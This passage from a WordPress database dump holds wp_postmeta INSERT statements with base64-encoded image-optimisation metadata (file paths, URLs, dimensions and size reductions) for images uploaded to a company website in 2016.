MDhcL1BURkUtY29hdGluZy0xNjAweDEwNjUuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLWNvYXRpbmctMTYwMHgxMDY1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1BURkUtY29hdGluZy0xNjAweDEwNjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMDExLCJpZCI6MTM3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1BURkUtY29hdGluZy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDAxNCwiaWQiOjEzN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLWNvYXRpbmctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLWNvYXRpbmctMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9QVEZFLWNvYXRpbmctMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTAwMTYsImlkIjoxMzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1jb2F0aW5nLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1jb2F0aW5nLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUFRGRS1jb2F0aW5nLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMDE4LCJpZCI6MTM3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1BURkUtY29hdGluZy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDAyMSwiaWQiOjEzN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1BURkUtY29hdGluZy0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDAyNCwiaWQiOjEzN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1BURkUtY29hdGluZy0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDAyNiwiaWQiOjEzN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1BURkUtY29hdGluZy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDAyOCwiaWQiOjEzN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1BURkUtY29hdGluZy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDAzMSwiaWQiOjEzN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1BURkUtY29hdGluZy00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDAzMywiaWQiOjEzN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1BURkUtY29hdGluZy02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDAzNiwiaWQiOjEzN31d'); 
INSERT INTO `wp_postmeta` VALUES (30347, 136, 'wpfc_optimisation_reduction', '2981'); 
INSERT INTO `wp_postmeta` VALUES (30348, 136, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMi5qcGciLCJ3aWR0aCI6NDUwLCJoZWlnaHQiOjMyMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01FZGljYWwtMS0yLmpwZyIsInJlZHVjdGlvbiI6Mjk3MiwidGltZSI6MTQ4MzU5MDA0MywiaWQiOiIxMzYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01FZGljYWwtMS0yLTM0MHgzMjAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozMjAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTItMzQweDMyMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMi0zNDB4MzIwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDA0NSwiaWQiOjEzNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01FZGljYWwtMS0yLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTAwNDcsImlkIjoxMzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01FZGljYWwtMS0yLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMDUwLCJpZCI6MTM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01FZGljYWwtMS0yLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDA1MiwiaWQiOjEzNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01FZGljYWwtMS0yLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDA1NCwiaWQiOjEzNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01FZGljYWwtMS0yLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDA1NiwiaWQiOjEzNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01FZGljYWwtMS0yLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDA1OCwiaWQiOjEzNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01FZGljYWwtMS0yLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDA2MSwiaWQiOjEzNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01FZGljYWwtMS0yLTQwMHgzMjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTItNDAweDMyMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjMyMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMi00MDB4MzIwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDA2MywiaWQiOjEzNn1d'); 
INSERT INTO `wp_postmeta` VALUES (30349, 91, 'wpfc_optimisation_reduction', '27240'); 
INSERT INTO `wp_postmeta` VALUES (30350, 91, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LmpwZyIsIndpZHRoIjozNzA0LCJoZWlnaHQiOjM3MDQsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1OTAwNjgsImlkIjoiOTEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjExLCJ0aW1lIjoxNDgzNTkwMDcxLCJpZCI6OTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LTgwMHg4MDAuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LTgwMHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy00LTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoyNzU4LCJ0aW1lIjoxNDgzNTkwMDc1LCJpZCI6OTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LTc2OHg3NjguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo3NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LTc2OHg3NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy00LTc2OHg3NjguanBnIiwicmVkdWN0aW9uIjoyNTExLCJ0aW1lIjoxNDgzNTkwMDc4LCJpZCI6OTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LTE2MDB4MTYwMC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNC0xNjAweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy00LTE2MDB4MTYwMC5qcGciLCJyZWR1Y3Rpb24iOjE0NTcxLCJ0aW1lIjoxNDgzNTkwMDgzLCJpZCI6OTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy00LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MDYsInRpbWUiOjE0ODM1OTAwODYsImlkIjo5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTQtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQzOCwidGltZSI6MTQ4MzU5MDA4OSwiaWQiOjkxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZ